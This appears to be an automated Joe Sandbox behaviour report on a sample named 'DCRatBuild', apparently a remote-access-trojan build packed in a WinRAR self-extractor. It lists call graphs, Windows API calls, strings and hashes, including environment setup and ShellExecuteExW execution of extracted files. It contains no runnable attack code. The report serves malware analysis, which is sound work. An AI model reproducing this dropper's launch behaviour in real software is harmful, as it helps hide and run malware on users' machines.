24601->24384 24602->24384 24603->24384 24604->24384 24605->24389 24606->24391 24607->24390 24614 d65c64 24608->24614 24611 d65d88 24611->24571 24612 d65c64 2 API calls 24612->24611 24613->24571 24617 d65c6e 24614->24617 24615 d65d56 24615->24611 24615->24612 24617->24615 24618 d6ad65 CharUpperW CompareStringW 24617->24618 24618->24617 24619->24576 24620->24581 24621->24579 24623 d6c8db 24622->24623 24628 d6a90e 84 API calls 24623->24628 24625 d6c90d 24629 d6a90e 84 API calls 24625->24629 24627 d6c918 24628->24625 24629->24627 24631 d6a5fe 24630->24631 24632 d6a691 FindNextFileW 24631->24632 24633 d6a621 FindFirstFileW 24631->24633 24634 d6a6b0 24632->24634 24635 d6a69c GetLastError 24632->24635 24636 d6a638 24633->24636 24641 d6a675 24633->24641 24634->24641 24635->24634 24637 d6b66c 2 API calls 24636->24637 24638 d6a64d 24637->24638 24639 d6a651 FindFirstFileW 24638->24639 24640 d6a66a GetLastError 24638->24640 24639->24640 24639->24641 24640->24641 24641->24267 24642->24071 24643->24078 24644->24078 24645->24080 24646->24088 24648 d69ef7 76 API calls 24647->24648 24649 d61f5b 24648->24649 24650 d619a6 97 API calls 24649->24650 24653 d61f78 24649->24653 24651 d61f68 24650->24651 24651->24653 24654 d66dc1 74 API calls 24651->24654 24653->24096 24653->24097 24654->24653 24863 d7b8e0 93 API calls _swprintf 24864 d78ce0 6 API calls 24867 d916e0 CloseHandle 24659 d7d997 24660 d7d89b 24659->24660 24661 d7df59 ___delayLoadHelper2@8 19 API calls 24660->24661 24661->24660 24663 d7d891 19 API calls ___delayLoadHelper2@8 24870 d77090 114 API calls 24871 d7cc90 70 API calls 24918 d7a990 97 API calls 24919 d79b90 GdipCloneImage GdipAlloc 24920 d89b90 21 API calls 2 library calls 24873 d7a89d 78 API calls 24874 d6ea98 FreeLibrary 24921 d82397 48 API calls 24670 d61385 82 API calls 3 library calls 24923 d85780 QueryPerformanceFrequency QueryPerformanceCounter 24777 d876bd 24778 d876e8 24777->24778 24779 d876cc 24777->24779 24781 d8b290 51 API calls 24778->24781 24779->24778 24780 d876d2 24779->24780 24800 d8895a 20 API calls _abort 24780->24800 24783 d876ef GetModuleFileNameA 24781->24783 24785 d87713 24783->24785 24784 d876d7 24801 d88839 26 API calls pre_c_initialization 24784->24801 24802 d877e1 38 API calls 24785->24802 24787 d876e1 24789 d87730 24803 d87956 20 API calls 2 library calls 24789->24803 24791 d8773d 24792 d87752 24791->24792 24793 d87746 24791->24793 24805 d877e1 38 API calls 24792->24805 24804 d8895a 20 API calls _abort 24793->24804 24796 d884de _free 20 API calls 24796->24787 24797 d87768 24798 d884de _free 20 API calls 24797->24798 24799 d8774b 24797->24799 24798->24799 24799->24796 24800->24784 24801->24787 24802->24789 24803->24791 24804->24799 24805->24797 24877 d616b0 84 API calls 24806 d890b0 24814 d8a56f 24806->24814 24810 d890cc 24811 d890d9 24810->24811 24822 d890e0 11 API calls 24810->24822 24813 d890c4 24815 d8a458 CallUnexpected 5 API calls 24814->24815 24816 d8a596 24815->24816 24817 d8a5ae TlsAlloc 24816->24817 24820 d8a59f 24816->24820 24817->24820 24818 d7ec4a CatchGuardHandler 5 API calls 24819 d890ba 24818->24819 24819->24813 24821 d89029 20 API calls 2 library calls 24819->24821 24820->24818 24821->24810 24822->24813 24823 d8a3b0 24824 d8a3bb 24823->24824 24826 d8a3e4 24824->24826 24827 d8a3e0 24824->24827 24829 d8a6ca 24824->24829 24836 d8a410 DeleteCriticalSection 24826->24836 24830 d8a458 CallUnexpected 5 API calls 24829->24830 24831 d8a6f1 24830->24831 24832 d8a6fa 24831->24832 24833 d8a70f InitializeCriticalSectionAndSpinCount 24831->24833 24834 d7ec4a CatchGuardHandler 5 API calls 24832->24834 24833->24832 24835 d8a726 24834->24835 24835->24824 24836->24827 24878 d81eb0 6 API calls 4 library calls 24926 d879b7 55 API calls _free 24879 d7e4a2 38 API calls 2 library calls 24880 d696a0 79 API calls 24927 d8e9a0 51 API calls 24929 d79b50 GdipDisposeImage GdipFree ___InternalCxxFrameHandler 24884 d88050 8 API calls ___vcrt_uninitialize 23723 d7dc5d 23724 d7dc2e 23723->23724 23726 d7df59 23724->23726 23754 d7dc67 23726->23754 23728 d7df73 23729 d7dff4 23728->23729 23730 d7dfd0 23728->23730 23734 d7e06c LoadLibraryExA 23729->23734 23737 d7e0cd 23729->23737 23738 d7e0df 23729->23738 23750 d7e19b 23729->23750 23731 d7ded7 DloadReleaseSectionWriteAccess 11 API calls 23730->23731 23732 d7dfdb RaiseException 23731->23732 23748 d7e1c9 23732->23748 23733 d7ec4a CatchGuardHandler 5 API calls 23735 d7e1d8 23733->23735 23736 d7e07f GetLastError 23734->23736 23734->23737 23735->23724 23739 d7e092 23736->23739 23740 d7e0a8 23736->23740 23737->23738 23742 d7e0d8 FreeLibrary 23737->23742 23741 d7e13d GetProcAddress 23738->23741 23738->23750 23739->23737 23739->23740 23743 d7ded7 DloadReleaseSectionWriteAccess 11 API calls 23740->23743 23744 d7e14d GetLastError 23741->23744 23741->23750 23742->23738 23746 d7e0b3 RaiseException 23743->23746 23747 d7e160 23744->23747 23746->23748 23749 d7ded7 DloadReleaseSectionWriteAccess 11 API calls 23747->23749 23747->23750 23748->23733 23751 d7e181 RaiseException 23749->23751 23765 d7ded7 23750->23765 23752 d7dc67 ___delayLoadHelper2@8 11 API calls 23751->23752 23753 d7e198 23752->23753 23753->23750 23755 d7dc73 23754->23755 23756 d7dc99 23754->23756 23773 d7dd15 23755->23773 23756->23728 23759 d7dc94 23783 d7dc9a 23759->23783 23762 d7ec4a CatchGuardHandler 5 API calls 23763 d7df55 23762->23763 23763->23728 23764 d7df24 23764->23762 23766 d7df0b 23765->23766 23767 d7dee9 23765->23767 23766->23748 23768 d7dd15 DloadLock 8 API calls 23767->23768 23769 d7deee 23768->23769 23770 d7df06 23769->23770 23771 d7de67 DloadProtectSection 3 API calls 23769->23771 23792 d7df0f 8 API calls 2 library calls 23770->23792 23771->23770 23774 d7dc9a DloadLock 3 API calls 23773->23774 23775 d7dd2a 23774->23775 23776 d7ec4a CatchGuardHandler 5 API calls 23775->23776 23777 d7dc78 23776->23777 23777->23759 23778 d7de67 23777->23778 23779 d7de7c DloadObtainSection 23778->23779 23780 d7deb7 VirtualProtect 23779->23780 23781 d7de82 23779->23781 23791 d7dd72 VirtualQuery GetSystemInfo 23779->23791 23780->23781 23781->23759 23784 d7dca7 23783->23784 23785 d7dcab 23783->23785 23784->23764 23786 d7dcb3 GetModuleHandleW 23785->23786 23787 d7dcaf 23785->23787 23788 d7dcc9 GetProcAddress 23786->23788 23790 d7dcc5 23786->23790 23787->23764 23789 d7dcd9 GetProcAddress 23788->23789 23788->23790 23789->23790 23790->23764 23791->23780 23792->23766 23796 d69b59 23797 d69bd7 23796->23797 23800 d69b63 23796->23800 23798 d69bad SetFilePointer 23798->23797 23799 d69bcd GetLastError 23798->23799 23799->23797 23800->23798 24931 d7be49 98 API calls 3 library calls 24886 d7ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24887 d78c40 GetClientRect 24888 d83040 5 API calls 2 library calls 24889 d90040 IsProcessorFeaturePresent 24932 d7d34e DialogBoxParamW 24890 d75c77 121 API calls __vswprintf_c_l 24891 d61075 82 API calls pre_c_initialization 23811 d7d573 23812 d7d580 23811->23812 23813 d6ddd1 53 API calls 23812->23813 23814 d7d594 23813->23814 23815 d6400a _swprintf 51 API calls 23814->23815 23816 d7d5a6 SetDlgItemTextW 23815->23816 23819 d7ac74 PeekMessageW 23816->23819 23820 d7ac8f GetMessageW 23819->23820 23821 d7acc8 23819->23821 23822 d7aca5 IsDialogMessageW 23820->23822 23823 d7acb4 TranslateMessage DispatchMessageW 23820->23823 23822->23821 23822->23823 23823->23821 24896 d7fc60 51 API calls 2 library calls 24899 d83460 RtlUnwind 24900 d89c60 71 API calls _free 24901 d89e60 31 API calls 2 library calls 24934 d8a918 27 API calls 2 library calls 24935 d66110 80 API calls 24936 d8b710 GetProcessHeap 24937 d7be49 108 API calls 4 library calls 24938 d61f05 126 API calls __EH_prolog 24675 d7ea00 24676 d7ea08 pre_c_initialization 24675->24676 24693 d88292 24676->24693 24678 d7ea13 pre_c_initialization 24700 d7e600 24678->24700 24680 d7ea9c 24708 d7ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 24680->24708 24682 d7ea28 __RTC_Initialize 24682->24680 24684 d7e7a1 pre_c_initialization 29 API calls 24682->24684 24683 d7eaa3 ___scrt_initialize_default_local_stdio_options 24685 d7ea41 pre_c_initialization 24684->24685 24685->24680 24686 d7ea52 24685->24686 24705 d7f15b InitializeSListHead 24686->24705 24688 d7ea57 pre_c_initialization ___InternalCxxFrameHandler 24706 d7f167 30 API calls 2 library calls 24688->24706 24690 d7ea7a pre_c_initialization 24707 d88332 38 API calls 3 library calls 24690->24707 24692 d7ea85 pre_c_initialization 24694 d882a1 24693->24694 24695 d882c4 24693->24695 24694->24695 24709 d8895a 20 API calls _abort 24694->24709 24695->24678 24697 d882b4 24710 d88839 26 API calls pre_c_initialization 24697->24710 24699 d882bf 24699->24678 24701 d7e60e 24700->24701 24704 d7e613 ___scrt_initialize_onexit_tables 24700->24704 24701->24704 24711 d7ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 24701->24711 24703 d7e696 24704->24682 24705->24688 24706->24690 24707->24692 24708->24683 24709->24697 24710->24699 24711->24703 24712 d7c40e 24713 d7c4c7 24712->24713 24720 d7c42c _wcschr 24712->24720 24714 d7c4e5 24713->24714 24731 d7be49 _wcsrchr 24713->24731 24747 d7ce22 24713->24747 24717 d7ce22 18 API calls 24714->24717 24714->24731 24715 d7aa36 ExpandEnvironmentStringsW 24715->24731 24717->24731 24718 d7ca8d 24720->24713 24721 d717ac CompareStringW 24720->24721 24721->24720 24722 d7c11d SetWindowTextW 24722->24731 24725 d835de 22 API calls 24725->24731 24727 d7bf0b SetFileAttributesW 24729 d7bfc5 GetFileAttributesW 24727->24729 24730 d7bf25 ___scrt_get_show_window_mode 24727->24730 24729->24731 24733 d7bfd7 DeleteFileW 24729->24733 24730->24729 24730->24731 24743 d6b4f7 52 API calls 2 library calls 24730->24743 24731->24715 24731->24718 24731->24722 24731->24725 24731->24727 24734 d7c2e7 GetDlgItem SetWindowTextW SendMessageW 24731->24734 24736 d7c327 SendMessageW 24731->24736 24741 d717ac CompareStringW 24731->24741 24742 d79da4 GetCurrentDirectoryW 24731->24742 24744 d6a52a 7 API calls 24731->24744 24745 d6a4b3 FindClose 24731->24745 24746 d7ab9a 76 API calls new 24731->24746 24733->24731 24738 d7bfe8 24733->24738 24734->24731 24735 d6400a _swprintf 51 API calls 24737 d7c008 GetFileAttributesW 24735->24737 24736->24731 24737->24738 24739 d7c01d MoveFileW 24737->24739 24738->24735 24739->24731 24740 d7c035 MoveFileExW 24739->24740 24740->24731 24741->24731 24742->24731 24743->24730 24744->24731 24745->24731 24746->24731 24750 d7ce2c ___scrt_get_show_window_mode 24747->24750 24748 d7d08a 24748->24714 24749 d7cf1b 24751 d6a180 4 API calls 24749->24751 24750->24748 24750->24749 24770 d717ac CompareStringW 24750->24770 24753 d7cf30 24751->24753 24754 d7cf4f ShellExecuteExW 24753->24754 24771 d6b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 24753->24771 24754->24748 24761 d7cf62 24754->24761 24756 d7cf47 24756->24754 24757 d7cf9b 24772 d7d2e6 6 API calls 24757->24772 24758 d7cff1 CloseHandle 24759 d7cfff 24758->24759 24760 d7d00a 24758->24760 24773 d717ac CompareStringW 24759->24773 24760->24748 24766 d7d081 ShowWindow 24760->24766 24761->24757 24761->24758 24764 d7cf91 ShowWindow 24761->24764 24764->24757 24765 d7cfb3 24765->24758 24767 d7cfc6 GetExitCodeProcess 24765->24767 24766->24748 24767->24758 24768 d7cfd9 24767->24768 24768->24758 24770->24749 24771->24756 24772->24765 24773->24760 24902 d7ec0b 28 API calls 2 library calls 24940 d7db0b 19 API calls ___delayLoadHelper2@8 24941 d7be49 103 API calls 4 library calls 24903 d7a430 73 API calls 24904 d61025 29 API calls pre_c_initialization 24842 d69f2f 24843 d69f44 24842->24843 24844 d69f3d 24842->24844 24845 d69f4a GetStdHandle 24843->24845 24852 d69f55 24843->24852 24845->24852 24846 d69fa9 WriteFile 24846->24852 24847 d69f7c WriteFile 24848 d69f7a 24847->24848 24847->24852 24848->24847 24848->24852 24850 d6a031 24854 d67061 75 API calls 24850->24854 24852->24844 24852->24846 24852->24847 24852->24848 24852->24850 24853 d66e18 60 API calls 24852->24853 24853->24852 24854->24844

                      Executed Functions

                      Function 00D7D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00D700CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00D700E4
                        • Part of subcall function 00D700CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D700F6
                        • Part of subcall function 00D700CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D70127
                        • Part of subcall function 00D79DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D79DAC
                        • Part of subcall function 00D7A335: OleInitialize.OLE32(00000000), ref: 00D7A34E
                        • Part of subcall function 00D7A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D7A385
                        • Part of subcall function 00D7A335: SHGetMalloc.SHELL32(00DA8430), ref: 00D7A38F
                        • Part of subcall function 00D713B3: GetCPInfo.KERNEL32(00000000,?), ref: 00D713C4
                        • Part of subcall function 00D713B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00D713D8
                      • GetCommandLineW.KERNEL32 ref: 00D7D61C
                      • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D7D643
                      • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D7D654
                      • UnmapViewOfFile.KERNEL32(00000000), ref: 00D7D68E
                        • Part of subcall function 00D7D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D7D29D
                        • Part of subcall function 00D7D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D7D2D9
                      • CloseHandle.KERNEL32(00000000), ref: 00D7D697
                      • GetModuleFileNameW.KERNEL32(00000000,00DBDC90,00000800), ref: 00D7D6B2
                      • SetEnvironmentVariableW.KERNEL32(sfxname,00DBDC90), ref: 00D7D6BE
                      • GetLocalTime.KERNEL32(?), ref: 00D7D6C9
                      • _swprintf.LIBCMT ref: 00D7D708
                      • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D7D71A
                      • GetModuleHandleW.KERNEL32(00000000), ref: 00D7D721
                      • LoadIconW.USER32(00000000,00000064), ref: 00D7D738
                      • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00D7D789
                      • Sleep.KERNEL32(?), ref: 00D7D7B7
                      • DeleteObject.GDI32 ref: 00D7D7F0
                      • DeleteObject.GDI32(?), ref: 00D7D800
                      • CloseHandle.KERNEL32 ref: 00D7D843
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                      • API String ID: 788466649-277078469
                      • Opcode ID: 2b137506a4ab7936ff0a511fb65dd87ce3996a1102818b6a9ad2578a01e785a0
                      • Instruction ID: 8d0b8354c1599ae57036f21089078b39569876d11931fd150247357d846e2589
                      • Opcode Fuzzy Hash: 2b137506a4ab7936ff0a511fb65dd87ce3996a1102818b6a9ad2578a01e785a0
                      • Instruction Fuzzy Hash: E761AE71904341AFD320AFA5EC49F6A3BA9EF49744F04442AF94DD23A1EBB89904D772
                      Function 00D79E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 770 d79e1c-d79e38 FindResourceW 771 d79f2f-d79f32 770->771 772 d79e3e-d79e50 SizeofResource 770->772 773 d79e52-d79e61 LoadResource 772->773 774 d79e70-d79e72 772->774 773->774 775 d79e63-d79e6e LockResource 773->775 776 d79f2e 774->776 775->774 777 d79e77-d79e8c GlobalAlloc 775->777 776->771 778 d79e92-d79e9b GlobalLock 777->778 779 d79f28-d79f2d 777->779 780 d79f21-d79f22 GlobalFree 778->780 781 d79ea1-d79ebf call d7f4b0 CreateStreamOnHGlobal 778->781 779->776 780->779 784 d79ec1-d79ee3 call d79d7b 781->784 785 d79f1a-d79f1b GlobalUnlock 781->785 784->785 790 d79ee5-d79eed 784->790 785->780 791 d79eef-d79f03 GdipCreateHBITMAPFromBitmap 790->791 792 d79f08-d79f16 790->792 791->792 793 d79f05 791->793 792->785 793->792
                      APIs
                      • FindResourceW.KERNEL32(00D7AE4D,PNG,?,?,?,00D7AE4D,00000066), ref: 00D79E2E
                      • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E46
                      • LoadResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E59
                      • LockResource.KERNEL32(00000000,?,?,?,00D7AE4D,00000066), ref: 00D79E64
                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D7AE4D,00000066), ref: 00D79E82
                      • GlobalLock.KERNEL32(00000000), ref: 00D79E93
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D79EB7
                      • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D79EFC
                      • GlobalUnlock.KERNEL32(00000000), ref: 00D79F1B
                      • GlobalFree.KERNEL32(00000000), ref: 00D79F22
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                      • String ID: PNG
                      • API String ID: 3656887471-364855578
                      • Opcode ID: 739fde0bd6a1adfd73453e8ed0c7e6b660c27e361775969de5768bc99d5c5587
                      • Instruction ID: c997053687efb7e2a6fd40bbd5b0be11adaf3b8c3e531b1627012d28e2a36ba3
                      • Opcode Fuzzy Hash: 739fde0bd6a1adfd73453e8ed0c7e6b660c27e361775969de5768bc99d5c5587
                      • Instruction Fuzzy Hash: 98316172204706AFC7109F61DC58D2BFBA9FF85751B088519F90AD2361EB31DD009AB1
                      Function 00D6A5F4 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 966 d6a5f4-d6a61f call d7e360 969 d6a691-d6a69a FindNextFileW 966->969 970 d6a621-d6a632 FindFirstFileW 966->970 971 d6a6b0-d6a6b2 969->971 972 d6a69c-d6a6aa GetLastError 969->972 973 d6a6b8-d6a75c call d6fe56 call d6bcfb call d70e19 * 3 970->973 974 d6a638-d6a64f call d6b66c 970->974 971->973 975 d6a761-d6a774 971->975 972->971 973->975 981 d6a651-d6a668 FindFirstFileW 974->981 982 d6a66a-d6a673 GetLastError 974->982 981->973 981->982 984 d6a684 982->984 985 d6a675-d6a678 982->985 987 d6a686-d6a68c 984->987 985->984 986 d6a67a-d6a67d 985->986 986->984 989 d6a67f-d6a682 986->989 987->975 989->987
                      APIs
                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A628
                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A65E
                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A66A
                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A692
                      • GetLastError.KERNEL32(?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A69E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: FileFind$ErrorFirstLast$Next
                      • String ID:
                      • API String ID: 869497890-0
                      • Opcode ID: c749cf721597706053dc7859444f6a17afcc08c39abe562c6455ba722cc49844
                      • Instruction ID: ddc99282034ddc0b3c8bed9f1d8de0faaa1d0db1a2998b649817093dbe4ae0b6
                      • Opcode Fuzzy Hash: c749cf721597706053dc7859444f6a17afcc08c39abe562c6455ba722cc49844
                      • Instruction Fuzzy Hash: DA415E72504641AFC324EF68C884ADAF7E8FF48354F084A2AF5D9D3250D774A9648FB2
                      Function 00D8753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002,00000000), ref: 00D8755E
                      • TerminateProcess.KERNEL32(00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002,00000000), ref: 00D87565
                      • ExitProcess.KERNEL32 ref: 00D87577
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      • Opcode ID: 0a2d8ff0094312e259a525bdf9b7475f12b121dc5d6b2e3f65e3b8374754b479
                      • Instruction ID: 8513493584ce56ae4766a79ca4ba43cda318a3e2f919be6e1904e36880f7149f
                      • Opcode Fuzzy Hash: 0a2d8ff0094312e259a525bdf9b7475f12b121dc5d6b2e3f65e3b8374754b479
                      • Instruction Fuzzy Hash: 7CE0B635004648ABCF11BF68DD09A497B69EB40745F248455F9099A232CB35DE42CB70
                      Function 00D6857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog_memcmp
                      • String ID:
                      • API String ID: 3004599000-0
                      • Opcode ID: c7d4482f80dcc1534d88997652d55410b800017f850a9d2bc3e4866978ea419b
                      • Instruction ID: c2d5bb96863db2fddc22103fc6ddecd18d7d2b2de394f3a159e86d75b330b531
                      • Opcode Fuzzy Hash: c7d4482f80dcc1534d88997652d55410b800017f850a9d2bc3e4866978ea419b
                      • Instruction Fuzzy Hash: 03823A70904245AFDF25CF64C895BFABBB9EF15300F0C42BAE959AB142DB315A48DB70
                      Function 00D7AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON
                      Download Yara Rule
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D7AEE5
                        • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                        • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prologItemTextWindow
                      • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                      • API String ID: 810644672-3870082069
                      • Opcode ID: f0262b2b2555b69cdc3234d29dc7d1fe142e051510eb241198f3f8178c4ed03c
                      • Instruction ID: 14a32b03595e604df98e7bdffeb955e2fd2abe8e685ed61dde2474a5504028b9
                      • Opcode Fuzzy Hash: f0262b2b2555b69cdc3234d29dc7d1fe142e051510eb241198f3f8178c4ed03c
                      • Instruction Fuzzy Hash: D5420570904345AFEB21ABA09C4AFBE7B7DEB06710F048156F649E62D1EBB44D44DB32
                      Function 00D700CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317libraryfileloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
